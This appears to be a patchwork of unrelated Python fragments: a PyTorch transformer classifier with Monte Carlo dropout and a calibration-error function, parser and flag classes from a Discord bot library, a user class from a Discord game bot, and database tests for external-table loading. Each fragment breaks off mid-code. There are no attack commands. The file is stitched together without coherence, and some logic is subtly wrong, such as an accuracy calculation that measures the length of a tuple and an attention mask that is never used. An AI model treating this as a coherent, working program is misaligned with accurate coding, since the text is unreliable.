concat = scores.transpose(1,2).contiguous().view(bs, -1, self.d_model)
output = self.out(concat)
return output
class Norm(Module):
def __init__(self, d_model, eps = 1e-6):
super().__init__()
self.size = d_model
# create two learnable parameters to calibrate normalisation
self.alpha = torch.nn.Parameter(torch.ones(self.size))
self.bias = torch.nn.Parameter(torch.zeros(self.size))
self.eps = eps
def forward(self, x):
norm = self.alpha * (x - x.mean(dim=-1, keepdim=True)) \
/ (x.std(dim=-1, keepdim=True) + self.eps) + self.bias
return norm
class FeedForward(Module):
def __init__(self, d_model, d_ff=2048, dropout = 0.3):
super().__init__()
# We set d_ff as a default to 2048
self.linear_1 = torch.nn.Linear(d_model, d_ff)
self.dropout = Dropout(dropout)
self.linear_2 = torch.nn.Linear(d_ff, d_model)
def forward(self, x):
x = self.dropout(F.relu(self.linear_1(x)))
x = self.linear_2(x)
return x
class EncoderLayer(Module):
def __init__(self, d_model, heads, dropout = 0.3):
super().__init__()
self.norm_1 = Norm(d_model)
self.norm_2 = Norm(d_model)
self.attn = MultiHeadAttention(heads, d_model)
self.ff = FeedForward(d_model)
self.dropout_1 = Dropout(dropout)
self.dropout_2 = Dropout(dropout)
def forward(self, x, mask = None):
x2 = self.norm_1(x)
x = x + self.dropout_1(self.attn(x2,x2,x2,mask = None))
x2 = self.norm_2(x)
x = x + self.dropout_2(self.ff(x2))
return x
class Encoder(Module):
def __init__(self, vocab_size = 1000, d_model = 32, N = 1, heads= 1):
super().__init__()
self.N = N
self.embed = Embedder(vocab_size, d_model)
self.pe = PositionalEncoder(d_model)
self.layers = get_clones(EncoderLayer(d_model, heads), N)
self.norm = Norm(d_model)
self.output_layer = torch.nn.Linear(d_model**2, 1)
self.output_activation = torch.nn.Sigmoid()
def forward(self, src):
bdim = src.shape[0]
x = self.embed(src)
#tlen = int(math.sqrt(src.shape[1]))
#x = src.reshape(int(src.shape[0]), tlen, tlen)
x = self.pe(x)
for i in range(self.N):
x = self.layers[i](x)
x = self.norm(x)
outputs = torch.autograd.Variable(torch.zeros(bdim), requires_grad = False)
for j in range(bdim):
outputs[j] = self.output_layer(x[j,:,:].flatten())
s = self.output_activation(outputs)
return s
class Dataset_single(Dataset):
def __init__(self, features, targets = None, transform=None):
self.features = features
if not targets is None:
self.targets = np.array(targets)
else:
self.targets = None
def __len__(self):
return self.features.shape[0]
def __getitem__(self, index):
instance = torch.tensor(self.features[index],
dtype=torch.long,
device='cpu')
if self.targets is not None:
target = torch.as_tensor(self.targets.reshape(-1, 1)[index],
device='cpu')
else:
target = -1
return instance, target
# This is were we train our model
class BAN:
def __init__ (self, num_epochs = 200, vocab_size = 100000, stopping_crit = 5, learning_rate = 0.001, tokenizer_num_words = 100000, max_padding = 256,N=1,heads = 1, batch_size = 64):
#self.learning_rate = 0.001
self.d_model = max_padding
self.N = N
self.attention_heads = heads
self.max_padding = max_padding
self.image_folder = None
self.learning_rate = learning_rate
self.classes_ = [0,1]
self.validation_index = 0
self.batch_size = batch_size
self.threshold_perf_tuples = []
self.num_epochs = num_epochs
self.probability_threshold = None
self.vocab_size = vocab_size
self.stopping_crit = stopping_crit
self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
logging.info("Using {}".format(self.device))
self.tokenizer = Tokenizer(num_words=tokenizer_num_words)
def pad_sequence(self, list_of_texts):
# https://towardsdatascience.com/text-classification-in-keras-part-2-how-to-use-the-keras-tokenizer-word-representations-fd571674df23
# pad_seq = get_input_attentions(list_of_texts, max_size = self.max_padding)
# logging.info(pad_seq.shape)
self.tokenizer.fit_on_texts(list_of_texts)
sequences = self.tokenizer.texts_to_sequences(list_of_texts)
pad_seq = pad_sequences(sequences, maxlen=self.max_padding)
return pad_seq
def encode_input_text_integer(self, list_of_texts, mapping = None):
## somewhat adhoc -> can be improved -> TODO: Byte pair.
unique_words = set()
for text in list_of_texts:
[unique_words.add(x) for x in text.strip().split()]
unique_words = list(unique_words)
if mapping is None:
mapping = {}
for index, word in enumerate(unique_words):
mapping[word] = index+1
encoded_texts = []
for text in list_of_texts:
encoded_sentence = [mapping[x] for x in text.strip().split()] + [0]*self.max_padding
encoded_texts.append(np.array(encoded_sentence[0:self.max_padding]))
return encoded_texts, mapping
def predict_proba(self, input_text_sequences, T=10, output_mean_probabilities = True):
pad_seq = input_text_sequences #pad_sequences(input_text_sequences, maxlen=self.max_padding)
pad_seq = np.array(pad_seq)
val_dataset = Dataset_single(pad_seq)
val_dataset = DataLoader(val_dataset, batch_size = self.batch_size, shuffle = False)
outputs = []
p = []
w= []
for i, (features, labels) in tqdm.tqdm(enumerate(val_dataset), total = len(val_dataset)):
features = features.to(self.device)
collection_of_preds = []
self.model.eval() ## Immutable during predictions.
self.model.apply(set_dropout_to_train) ## Unlock Dropout layers.
for _ in range(T):
prediction = self.model(features).detach().cpu().numpy()
collection_of_preds.append(prediction)
p = np.matrix(collection_of_preds).T
w.append(p)
w = np.concatenate(w, axis = 0)
assert w.shape[0] == pad_seq.shape[0]
assert w.shape[1] == T
MC_pred = w.reshape(pad_seq.shape[0], T)
pred = pd.DataFrame(MC_pred)
MC_pred_positive = pred.mean(axis=1).values
MC_pred_negative = 1 - MC_pred_positive
MC_pred = np.vstack((MC_pred_negative, MC_pred_positive)).T
self.model.train()
return MC_pred.astype(np.float64)
def predict(self, input_text_sequences, T=100, output_mean_probabilities = True):
pad_seq = input_text_sequences #pad_sequences(input_text_sequences, maxlen=self.max_padding)
pad_seq = np.array(pad_seq)
val_dataset = Dataset_single(pad_seq)
val_dataset = DataLoader(val_dataset, batch_size = self.batch_size, shuffle = False)
outputs = []
p = []
w= []
for i, (features, labels) in tqdm.tqdm(enumerate(val_dataset), total = len(val_dataset)):
features = features.to(self.device)
collection_of_preds = []
self.model.eval() ## Immutable during predictions.
self.model.apply(set_dropout_to_train) ## Unlock Dropout layers.
for _ in range(T):
prediction = self.model(features).detach().cpu().numpy()
collection_of_preds.append(prediction)
p = np.matrix(collection_of_preds).T
w.append(p)
w = np.concatenate(w, axis = 0)
assert w.shape[0] == pad_seq.shape[0]
assert w.shape[1] == T
if output_mean_probabilities:
MC_pred = w.reshape(pad_seq.shape[0], T)
pred = pd.DataFrame(MC_pred)
MC_pred = pred.mean(axis=1).values
else:
MC_pred = w.reshape(pad_seq.shape[0], T)
self.model.train()
return MC_pred
def ece_score(self, probab_pred, real_y, mbin = 3, threshold = 0.5):
all_vals = len(real_y)
bin_perf = []
current_bin = 0
predictions = probab_pred.copy()
predictions[predictions >= threshold] = 1
predictions[predictions < threshold] = 0
reals_internal = []
predictions_internal = []
## compute bins (last one is extended with the remainder)
intercept_bins = [x for x in range(1,all_vals) if x % mbin == 0]
remainder = all_vals % mbin
if len(intercept_bins) == 0:
intercept_bins = [all_vals]
intercept_bins[-1] += remainder
intercept_index = 0
for j in range(all_vals):
if j == intercept_bins[intercept_index] and j > 0:
if intercept_index < len(intercept_bins)-1:
intercept_index += 1
current_bin += 1
equals = np.where(np.array(reals_internal) == np.array(predictions_internal))
acc_bin = len(equals)/len(predictions_internal)
conf_bin = np.mean(np.array(predictions_internal))
bin_perf.append([current_bin, acc_bin, conf_bin,len(reals_internal)])
reals_internal = [real_y[j]]
predictions_internal = [predictions[j]]
else:
reals_internal.append(real_y[j])
predictions_internal.append(predictions[j])
ece_score_final = 0
for bins in bin_perf:
bin_size = bins[3]
total = len(probab_pred)
partial = (bin_size/total) * np.abs(bins[1] - bins[2])
ece_score_final += partial
return ece_score_final
def fit(self, input_text_sequences, targets, val_percentage = 0.2, adaptive_threshold = True, validation_metric = "precision"):
"""
The main fit method. | |
|
+---------------+---------------+-----------------------------------------------------------------------+
| id | 3 | Whether the entity should be picked up by it's name. |
+---------------+---------------+-----------------------------------------------------------------------+
| everywhere | 4 | Whether the entity should be searched out of the local scope. |
| | | Mostly pairs with the `id` flag. |
+---------------+---------------+-----------------------------------------------------------------------+
| profile | 5 | User parser only. Can be used when user cache is disabled to |
| | | ensure, that the user will have local guild profile if applicable. |
+---------------+---------------+-----------------------------------------------------------------------+
There are already precreated flags, which are the following:
+-------------------+-------------------------------------------+
| Name | Included flags |
+===================+===========================================+
| user_default | mention, name, id |
+-------------------+-------------------------------------------+
| user_all | mention, name, id, everywhere, profile |
+-------------------+-------------------------------------------+
| client_default | mention, name, id |
+-------------------+-------------------------------------------+
| client_all | mention, name, id, everywhere |
+-------------------+-------------------------------------------+
| role_default | mention, name, id |
+-------------------+-------------------------------------------+
| role_all | mention, name, id, everywhere |
+-------------------+-------------------------------------------+
| channel_default | mention, name, id |
+-------------------+-------------------------------------------+
| channel_all | mention, name, id, everywhere |
+-------------------+-------------------------------------------+
| emoji_default | mention, name, id |
+-------------------+-------------------------------------------+
| emoji_all | mention, name, id, everywhere |
+-------------------+-------------------------------------------+
| guild_default | id |
+-------------------+-------------------------------------------+
| guild_all | id, everywhere |
+-------------------+-------------------------------------------+
| message_default | url, id |
+-------------------+-------------------------------------------+
| message_all | url, id, everywhere |
+-------------------+-------------------------------------------+
| invite_default | url, id |
+-------------------+-------------------------------------------+
| invite_all | url, id |
+-------------------+-------------------------------------------+
Note, if you use for example a `'user'` parser, then by default it will use the `user_default` flags, and it
will ignore everything else, than `user_all`.
Some events, like `int`, or `str` do not have any flags, what means, their behaviour cannot be altered.
"""
__keys__ = {
'url': 0,
'mention': 1,
'name': 2,
'id': 3,
'everywhere': 4,
'profile': 5,
}
user_default = NotImplemented
user_all = NotImplemented
client_default = NotImplemented
client_all = NotImplemented
role_default = NotImplemented
role_all = NotImplemented
channel_default = NotImplemented
channel_all = NotImplemented
emoji_default = NotImplemented
emoji_all = NotImplemented
guild_default = NotImplemented
guild_all = NotImplemented
message_default = NotImplemented
message_all = NotImplemented
invite_default = NotImplemented
invite_all = NotImplemented
ConverterFlag.user_default = ConverterFlag().update_by_keys(mention=True, name=True, id=True)
ConverterFlag.user_all = ConverterFlag.user_default.update_by_keys(everywhere=True, profile=True)
ConverterFlag.client_default = ConverterFlag().update_by_keys(mention=True, name=True, id=True)
ConverterFlag.client_all = ConverterFlag.client_default.update_by_keys(everywhere=True)
ConverterFlag.role_default = ConverterFlag().update_by_keys(mention=True, name=True, id=True)
ConverterFlag.role_all = ConverterFlag.role_default.update_by_keys(everywhere=True)
ConverterFlag.channel_default = ConverterFlag().update_by_keys(mention=True, name=True, id=True)
ConverterFlag.channel_all = ConverterFlag.channel_default.update_by_keys(everywhere=True)
ConverterFlag.emoji_default = ConverterFlag().update_by_keys(mention=True, name=True, id=True)
ConverterFlag.emoji_all = ConverterFlag.emoji_default.update_by_keys(everywhere=True)
ConverterFlag.guild_default = ConverterFlag().update_by_keys(id=True)
ConverterFlag.guild_all = ConverterFlag.guild_default.update_by_keys(everywhere=True)
ConverterFlag.message_default = ConverterFlag().update_by_keys(url=True, id=True)
ConverterFlag.message_all = ConverterFlag.message_default.update_by_keys(everywhere=True)
ConverterFlag.invite_default = ConverterFlag().update_by_keys(url=True, id=True)
ConverterFlag.invite_all = ConverterFlag.invite_default
CONVERTER_FLAG_URL = 1 << ConverterFlag.__keys__['url']
CONVERTER_FLAG_MENTION = 1 << ConverterFlag.__keys__['mention']
CONVERTER_FLAG_NAME = 1 << ConverterFlag.__keys__['name']
CONVERTER_FLAG_ID = 1 << ConverterFlag.__keys__['id']
CONVERTER_FLAG_EVERYWHERE = 1 << ConverterFlag.__keys__['everywhere']
CONVERTER_FLAG_PROFILE = 1 << ConverterFlag.__keys__['profile']
class ContentParserContext:
"""
Content parser instance context used when parsing a message's content.
Attributes
----------
client : ``Client``
The respective client.
content : `str`
A message's content after it's prefix.
index : `int`
The index, of the last character's end.
last_part : `str` or `None`
The last parsed part.
last_start : `bool`
When the last returned string started
length : `int`
The length of the string to parse.
message : ``Message``
The respective message.
result : `list` of `Any`
The successfully parsed objects.
separator : ``ContentParameterSeparator``
The parameter separator of the parser.
"""
__slots__ = ('client', 'content', 'index', 'last_part', 'last_start', 'length', 'message', 'result', 'separator', )
def __init__(self, separator, client, message, content):
"""
Creates a new ``ContentParserContext`` instance.
Parameters
----------
separator : ``ContentParameterSeparator``
The parameter separator of the parser.
client : ``Client``
The respective client.
message : ``Message``
The respective message.
content : `str`
A message's content after it's prefix.
"""
self.separator = separator
self.client = client
self.message = message
self.index = 0
self.length = len(content)
self.content = content
self.last_part = None
self.last_start = 0
self.result = []
def get_next(self):
"""
Gets the next string part from a respective message's content.
Returns
-------
next_ : `str` or `None`
Returns `None` if the message has no more parts left.
"""
index = self.index
length = self.length
if index == length:
if self.last_start == index:
part = None
else:
part = self.last_part
else:
part, self.index = self.separator(self.content, index)
self.last_part = part
self.last_start = index
return part
def mark_last_as_used(self):
"""
Marks the lastly returned string as it was used up, making the next call to try to parse a
new one.
"""
self.last_start = self.index
def get_rest(self):
"""
Returns the not yet used string part of ``.content``.
Returns
-------
rest : `str`
Might be empty string.
"""
last_start = self.last_start
rest = self.content
if last_start:
rest = rest[last_start:]
return rest
DEFAULT_TYPE_NONE = 0
DEFAULT_TYPE_OBJ = 1
DEFAULT_TYPE_CALL = 2
DEFAULT_TYPE_NAMES = ('DEFAULT_TYPE_NONE', 'DEFAULT_TYPE_OBJ', 'DEFAULT_TYPE_CALL', )
class ParserContextBase:
"""
Base class for parser contexts.
"""
__slots__ = ()
async def __call__(self, content_parser_ctx):
"""
Calls the ``ParserContextBase`` with the given content parser context.
This method is a coroutine.
Parameters
----------
content_parser_ctx : ``ContentParserContext``
The content parser context in which the conversion is executed.
Returns
-------
passed : `bool`
Whether parsing out the variable was successful.
"""
return True
def __repr__(self):
"""Returns the parser context's representation."""
return f'<{self.__class__.__name__}>'
class RestParserContext(ParserContextBase):
"""
Parser context used when getting rest value.
Attributes
----------
default : `Any`
The default object to return if the parser fails.
default_type : `int`
Describes how `default` is used up.
Possible values:
+-----------------------+-------+
| Respective name | Value |
+=======================+=======+
| DEFAULT_TYPE_NONE | 0 |
+-----------------------+-------+
| DEFAULT_TYPE_OBJ | 1 |
+-----------------------+-------+
| DEFAULT_TYPE_CALL | 2 |
+-----------------------+-------+
"""
__slots__ = ('default', 'default_type')
def __new__(cls, default_type, default):
"""
Creates a new parser context instance with the given parameters.
Parameters
----------
default_type : `Any`
Describes how `default` is used up.
Possible values:
+-----------------------+-------+
| Respective name | Value |
+=======================+=======+
| DEFAULT_TYPE_NONE | 0 |
+-----------------------+-------+
| DEFAULT_TYPE_OBJ | 1 |
+-----------------------+-------+
| DEFAULT_TYPE_CALL | 2 |
+-----------------------+-------+
default : `Any`
The default object to return if the parser fails
"""
self = object.__new__(cls)
self.default_type = default_type
self.default = default
return self
async def __call__(self, content_parser_ctx):
"""
Calls the ``RestParserContext`` with the given content parser context.
This method is a coroutine.
Parameters
----------
content_parser_ctx : ``ContentParserContext``
The content parser context in which the conversion is executed.
Returns
-------
passed : `bool`
Whether parsing out the variable was successful.
"""
result = content_parser_ctx.get_rest()
if (not result):
default_type = self.default_type
if default_type:
result = self.default
if default_type == DEFAULT_TYPE_CALL:
result = await result(self, content_parser_ctx)
content_parser_ctx.result.append(result)
return True
def __repr__(self):
"""Returns the parser context's representation."""
result = [
'<',
self.__class__.__name__,
]
default_type = self.default_type
if default_type:
result.append(' default_type=')
result.append(repr(default_type))
result.append(' (')
result.append(DEFAULT_TYPE_NAMES[default_type])
result.append('), default=')
result.append(repr(self.default))
result.append('>')
return ''.join(result)
class ParserContext(ParserContextBase):
"""
Parser context used inside of chained content events.
Attributes
----------
converter : `async-callable`
A function, what converts a part of the a respective message's content.
flags : ``ConverterFlag``
Flags which describe what details should the parser function check.
type : `None` or `type`
Type info about the entity to parse.
"""
__slots__ = ('converter', 'flags', 'type')
def __new__(cls, flagged_annotation):
"""
Creates a new parser context instance with the given parameters.
Parameters
----------
flagged_annotation : ``FlaggedAnnotation``
Describes what type of entity and how it should be parsed.
Raises
------
TypeError
If `flagged_annotation` was given as `tuple`.
"""
type_ = flagged_annotation.annotation
if type(type_) is tuple:
raise TypeError(f'`flagged_annotation` cannot be given as `tuple`, when creating a `{cls.__name__}` '
f'instance, got {flagged_annotation!r}.')
self = object.__new__(cls)
self.flags = flagged_annotation.flags
self.type = type_
self.converter = CONVERTER_SETTING_TYPE_RELATION_MAP[type_].converter
return self
async def __call__(self, content_parser_ctx):
"""
Calls the ``ParserContext`` with the given content parser context.
This method is a coroutine.
Parameters
----------
content_parser_ctx : ``ContentParserContext``
The content parser context in which the conversion is executed.
Returns
-------
passed : `bool`
Whether parsing out the variable was successful.
"""
result = await self.converter(self, content_parser_ctx)
if result is None:
return False
content_parser_ctx.mark_last_as_used()
content_parser_ctx.result.append(result)
return True
def __repr__(self):
"""Returns the parser | |
<reponame>Laura7089/GOF2BountyBot
# Typing imports
from __future__ import annotations
from typing import Union, List, TYPE_CHECKING
if TYPE_CHECKING:
from .battles import DuelRequest
from .items import bbShip, bbModuleFactory, bbWeapon, bbTurret
from .items.modules import bbModule
from ..bbConfig import bbConfig
from . import bbInventory, bbInventoryListing
from ..userAlerts import UserAlerts
from datetime import datetime
from discord import Guild, Member
from . import bbGuild
from ..logging import bbLogger
# Dictionary-serialized bbShip to give to new players
defaultShipLoadoutDict = {"name": "Betty", "builtIn":True,
"weapons":[{"name": "Micro Gun MK I", "builtIn": True}],
"modules":[{"name": "Telta Quickscan", "builtIn": True}, {"name": "E2 Exoclad", "builtIn": True}, {"name": "IMT Extract 1.3", "builtIn": True}]}
# Default attributes to give to new players
defaultUserDict = {"credits":0, "bountyCooldownEnd":0, "lifetimeCredits":0, "systemsChecked":0, "bountyWins":0, "activeShip": defaultShipLoadoutDict, "inactiveWeapons":[{"item": {"name": "Nirai Impulse EX 1", "builtIn": True}, "count": 1}]}
# Reference value not pre-calculated from defaultUserDict. This is not used in the game's code, but provides a reference for game design.
defaultUserValue = 28970
class bbUser:
"""A user of the bot. There is currently no guarantee that user still shares any guilds with the bot, though this is planned to change in the future.
:var id: The user's unique ID. The same as their unique discord ID.
:vartype id: int
:var credits: The amount of credits (currency) this user has
:vartype credits: int
:var lifetimeCredits: The total amount of credits this user has earned through hunting bounties (TODO: rename)
:vartype lifetimeCredits: int
:var bountyCooldownEnd: A utc timestamp representing when the user's cmd_check cooldown is due to expire
:vartype bountyCooldownEnd: float
:var systemsChecked: The total number of space systems this user has checked
:vartype systemsChecked: int
:var bountyWins: The total number of bounties this user has won
:vartype bountyWins: int
:var activeShip: The user's currently equipped bbShip
:vartype activeShip: bbShip
:var inactiveShips: The bbShips currently in this user's inventory (unequipped)
:vartype inactiveShips: bbInventory
:var inactiveModules: The bbModules currently in this user's inventory (unequipped)
:vartype inactiveModules: bbInventory
:var inactiveWeapons: The bbWeapons currently in this user's inventory (unequipped)
:vartype inactiveWeapons: bbInventory
:var inactiveTurrets: The bbTurrets currently in this user's inventory (unequipped)
:vartype inactiveTurrets: bbInventory
:var lastSeenGuildId: The ID of the guild where this user was last active. Not guaranteed to be present.
:vartype lastSeenGuildId: int
:var hasLastSeenGuildId: Whether or not the user currently has a lastSeenGuildId
:vartype hasLastSeenGuildId: bool
:var duelRequests: A dictionary mapping target bbUser objects to DuelRequest objects. Only contains duel requests issued by this user.
:vartype duelRequests: dict[bbUser, DuelRequest]
:var duelWins: The total number of duels the user has won
:vartype duelWins: int
:var duelLosses: The total number of duels the user has lost
:vartype duelLosses: int
:var duelCreditsWins: The total amount of credits the user has won through fighting duels
:vartype duelCreditsWins: int
:var duelCreditsLosses: The total amount of credits the user has lost through fighting duels
:vartype duelCreditsLosses: int
:var userAlerts: A dictionary mapping UserAlerts.UABase subtypes to instances of that subtype
:vartype userAlerts: dict[type, UserAlerts.UABase]
:var bountyWinsToday: The number of bounties the user has won today
:vartype bountyWinsToday: int
:var dailyBountyWinsReset: A datetime.datetime representing the time at which the user's bountyWinsToday should be reset to zero
:vartype dailyBountyWinsReset: datetime.datetime
:var pollOwned: Whether or not this user has a running ReactionPollMenu
:vartype pollOwned: bool
"""
def __init__(self, id : int, credits=0, lifetimeCredits=0,
bountyCooldownEnd=-1, systemsChecked=0, bountyWins=0, activeShip=None,
inactiveShips=bbInventory.bbInventory(), inactiveModules=bbInventory.bbInventory(), inactiveWeapons=bbInventory.bbInventory(), inactiveTurrets=bbInventory.bbInventory(),
lastSeenGuildId=-1, duelWins=0, duelLosses=0, duelCreditsWins=0, duelCreditsLosses=0,
alerts={}, bountyWinsToday=0, dailyBountyWinsReset=datetime.utcnow(), pollOwned=False):
"""
:param int id: The user's unique ID. The same as their unique discord ID.
:param int credits: The amount of credits (currency) this user has (Default 0)
:param int lifetimeCredits: The total amount of credits this user has earned through hunting bounties (TODO: rename) (Default 0)
:param float bountyCooldownEnd: A utc timestamp representing when the user's cmd_check cooldown is due to expire (Default -1)
:param int systemsChecked: The total number of space systems this user has checked (Default 0)
:param int bountyWins: The total number of bounties this user has won (Default 0)
:param bbShip activeShip: The user's currently equipped bbShip (Default None)
:param bbInventory inactiveShips: The bbShips currently in this user's inventory (unequipped) (Default empty bbInventory)
:param bbInventory inactiveModules: The bbModules currently in this user's inventory (unequipped) (Default empty bbInventory)
:param bbInventory inactiveWeapons: The bbWeapons currently in this user's inventory (unequipped) (Default empty bbInventory)
:param bbInventory inactiveTurrets: The bbTurrets currently in this user's inventory (unequipped) (Default empty bbInventory)
:param int lastSeenGuildId: The ID of the guild where this user was last active. Not guaranteed to be present. (Default -1)
:param int duelWins: The total number of duels the user has won (Default 0)
:param int duelLosses: The total number of duels the user has lost (Default 0)
:param int duelCreditsWins: The total amount of credits the user has won through fighting duels (Default 0)
:param int duelCreditsLosses: The total amount of credits the user has lost through fighting duels (Default 0)
:param userAlerts: A dictionary mapping either (UserAlerts.UABase subtypes or string UA ids from UserAlerts.userAlertsIDsTypes) to either (instances of that subtype or booleans representing the alert state) (Default {})
:type userAlerts: dict[type or str, UserAlerts.UABase or bool]
:param int bountyWinsToday: The number of bounties the user has won today (Default 0)
:param datetime.datetime dailyBountyWinsReset: A datetime.datetime representing the time at which the user's bountyWinsToday should be reset to zero (Default datetime.utcnow())
:param bool pollOwned: Whether or not this user has a running ReactionPollMenu (Default False)
:raise TypeError: When given an argument of incorrect type
"""
if type(id) == float:
id = int(id)
elif type(id) != int:
raise TypeError("id must be int, given " + str(type(id)))
if type(credits) == float:
credits = int(credits)
elif type(credits) != int:
raise TypeError("credits must be int, given " + str(type(credits)))
if type(lifetimeCredits) == float:
lifetimeCredits = int(lifetimeCredits)
elif type(lifetimeCredits) != int:
raise TypeError("lifetimeCredits must be int, given " + str(type(lifetimeCredits)))
if type(bountyCooldownEnd) == int:
bountyCooldownEnd = float(bountyCooldownEnd)
if type(bountyCooldownEnd) != float:
raise TypeError("bountyCooldownEnd must be float, given " + str(type(bountyCooldownEnd)))
if type(systemsChecked) == float:
systemsChecked = int(systemsChecked)
elif type(systemsChecked) != int:
raise TypeError("systemsChecked must be int, given " + str(type(systemsChecked)))
if type(bountyWins) == float:
bountyWins = int(bountyWins)
elif type(bountyWins) != int:
raise TypeError("bountyWins must be int, given " + str(type(bountyWins)))
self.id = id
self.credits = credits
self.lifetimeCredits = lifetimeCredits
self.bountyCooldownEnd = bountyCooldownEnd
self.systemsChecked = systemsChecked
self.bountyWins = bountyWins
self.activeShip = activeShip
self.inactiveShips = inactiveShips
self.inactiveModules = inactiveModules
self.inactiveWeapons = inactiveWeapons
self.inactiveTurrets = inactiveTurrets
self.lastSeenGuildId = lastSeenGuildId
self.hasLastSeenGuildId = lastSeenGuildId != -1
self.duelRequests = {}
self.duelWins = duelWins
self.duelLosses = duelLosses
self.duelCreditsWins = duelCreditsWins
self.duelCreditsLosses = duelCreditsLosses
self.userAlerts = {}
# Convert the given user alerts to types and instances. The given alerts may be IDs instead of types, or booleans instead of instances.
for alertID in UserAlerts.userAlertsIDsTypes:
alertType = UserAlerts.userAlertsIDsTypes[alertID]
if alertType in alerts:
if isinstance(alerts[alertType], UserAlerts.UABase):
self.userAlerts[alertType] = alerts[alertType]
elif isinstance(alerts[alertType], bool):
self.userAlerts[alertType] = alertType(alerts[alertType])
else:
bbLogger.log("bbUsr", "init", "Given unknown alert state type for UA " + alertID + ". Must be either UABase or bool, given " + alerts[alertType].__class__.__name__ + ". Alert reset to default (" + str(alertType(bbConfig.userAlertsIDsDefaults[alertID])) + ")", category="usersDB", eventType="LOAD-UA_STATE_TYPE")
self.userAlerts[alertType] = alertType(bbConfig.userAlertsIDsDefaults[alertID])
elif alertID in alerts:
if isinstance(alerts[alertID], UserAlerts.UABase):
self.userAlerts[alertType] = alerts[alertID]
elif isinstance(alerts[alertID], bool):
self.userAlerts[alertType] = alertType(alerts[alertID])
else:
bbLogger.log("bbUsr", "init", "Given unknown alert state type for UA " + alertID + ". Must be either UABase or bool, given " + alerts[alertID].__class__.__name__ + ". Alert reset to default (" + str(alertType(bbConfig.userAlertsIDsDefaults[alertID])) + ")", category="usersDB", eventType="LOAD-UA_STATE_TYPE")
self.userAlerts[alertType] = alertType(bbConfig.userAlertsIDsDefaults[alertID])
else:
self.userAlerts[alertType] = alertType(bbConfig.userAlertsIDsDefaults[alertID])
self.bountyWinsToday = bountyWinsToday
self.dailyBountyWinsReset = dailyBountyWinsReset
self.pollOwned = pollOwned
def resetUser(self):
"""Reset the user's attributes back to their default values.
"""
self.credits = 0
self.lifetimeCredits = 0
self.bountyCooldownEnd = -1
self.systemsChecked = 0
self.bountyWins = 0
self.activeShip = bbShip.fromDict(defaultShipLoadoutDict)
self.inactiveModules.clear()
self.inactiveShips.clear()
self.inactiveWeapons.clear()
self.inactiveTurrets.clear()
self.duelWins = 0
self.duelLosses = 0
self.duelCreditsWins = 0
self.duelCreditsLosses = 0
self.pollOwned = False
def numInventoryPages(self, item : str, maxPerPage : int) -> int:
"""Get the number of pages required to display all of the user's unequipped items of the named type, displaying the | |
"a_byteint byteint, a_smallint "
"smallint, a_int integer, a_bigint bigint, "
"a_numps numeric(36,14), "
"a_nump numeric(5), a_dec decimal(15,7), "
"a_angle integer, a_date date, "
"a_time time, a_timetz timetz, a_timestamp "
"timestamp, a_interval interval ) "
"USING (DATAOBJECT "
"('/tmp/all_datatypes_retunload_ext_rs_odbc') "
"REMOTESOURCE "
"'odbc' DELIMITER ',' DATESTYLE 'DMY' "
"COMPRESS 'false' ENCODING 'internal')")
self.cursor.execute("INSERT INTO all_datatypes_retunload_ext "
"SELECT * from all_datatypes")
except Exception as e:
self.assertEqual(str(e), "ERROR: Remotesource option "
"of external table "
"was not defined to load/unload "
"using a python client\n\x00",
"ERROR: Data Difference")
self.cursor.execute("drop table all_datatypes_retunload_ext")
self.cursor.execute("drop table all_datatypes")
def test_RemoteUnloadBasicCompressed(self):
self.performOperation("./setup_all_datatype")
self.cursor.execute("CREATE EXTERNAL TABLE "
"all_datatypes_retunload_ext "
"(a_srno integer, a_char5"
"char(5), a_char20 char(20) not NULL, "
"a_char1000 char(1000), "
"a_varchar1 varchar(1), a_varchar50 varchar(50), "
"a_real float(5), "
"a_double float(15), a_byteint byteint, "
"a_smallint smallint, "
"a_int integer, a_bigint bigint, "
"a_numps numeric(36,14), "
"a_nump numeric(5), a_dec decimal(15,7), "
"a_angle integer, "
"a_date date, a_time time, a_timetz timetz, "
"a_timestamp timestamp, "
"a_interval interval ) USING "
"(DATAOBJECT "
"('/tmp/all_datatypes_retunload_ext_compressed')"
"REMOTESOURCE 'python' COMPRESS 'true' FORMAT "
"'internal' ENCODING 'internal')")
self.cursor.execute("INSERT INTO all_datatypes_retunload_ext "
"SELECT * from all_datatypes")
self.assertEqual(12, self.cursor.rowcount, "ERROR: Data Difference")
self.cursor.execute("drop table all_datatypes_retunload_ext")
self.cursor.execute("drop table all_datatypes")
def test_Joins1(self):
self.performOperation("./setup_all_datatype")
self.cursor.execute("SELECT * FROM all_datatypes AS tab1 NATURAL JOIN "
"all_datatypes AS tab2 ORDER BY "
"tab1.a_srno, tab2.a_srno")
results = self.cursor.fetchall()
c = 0
for c1, c2, c3, c4, c5, c6, c7, c8, c9, c10, c11, \
c12, c13, c14, c15, c16, c17, c18, c19, c20, c21 \
in results:
c = c + 1
self.assertEqual(5, c, "ERROR: Data Difference")
self.cursor.execute("SELECT * FROM all_datatypes AS tab1 INNER JOIN "
"all_datatypes AS tab2 using(a_srno) ORDER BY "
"tab1.a_srno, tab2.a_srno")
results = self.cursor.fetchall()
c = 0
for c1, c2, c3, c4, c5, c6, c7, c8, c9, c10, \
c11, c12, c13, c14, c15, c16, c17, c18, c19, c20, \
c21, d1, d2, d3, d4, d5, d6, d7, d8, d9, d10, d11, \
d12, d13, d14, d15, d16, d17, d18, d19, d20 \
in results:
c = c + 1
self.assertEqual(12, c, "ERROR: Data Difference")
self.cursor.execute("SELECT * FROM all_datatypes SELF JOIN "
"all_datatypes USING (a_srno)")
results = self.cursor.fetchall()
c = 0
for c1, c2, c3, c4, c5, c6, c7, c8, c9, c10, c11, c12, \
c13, c14, c15, c16, c17, c18, c19, c20, c21, d1, d2, \
d3, d4, d5, d6, d7, d8, d9, d10, d11, d12, d13, d14, d15, \
d16, d17, d18, d19, d20 \
in results:
c = c + 1
self.assertEqual(12, c, "ERROR: Data Difference")
self.cursor.execute("drop table all_datatypes")
def test_Joins2(self):
self.performOperation("./setup_all_datatype")
self.cursor.execute("SELECT * FROM all_datatypes AS tab1 "
"RIGHT OUTER JOIN "
"all_datatypes AS tab2 USING(a_char20) ORDER BY "
"tab1.a_srno,tab2.a_srno")
results = self.cursor.fetchall()
c = 0
for c1, c2, c3, c4, c5, c6, c7, c8, c9, c10, \
c11, c12, c13, c14, c15, c16, c17, c18, c19, \
c20, c21, d1, d2, d3, d4, d5, d6, d7, d8, d9, \
d10, d11, d12, d13, d14, d15, d16, d17, d18, d19, d20 \
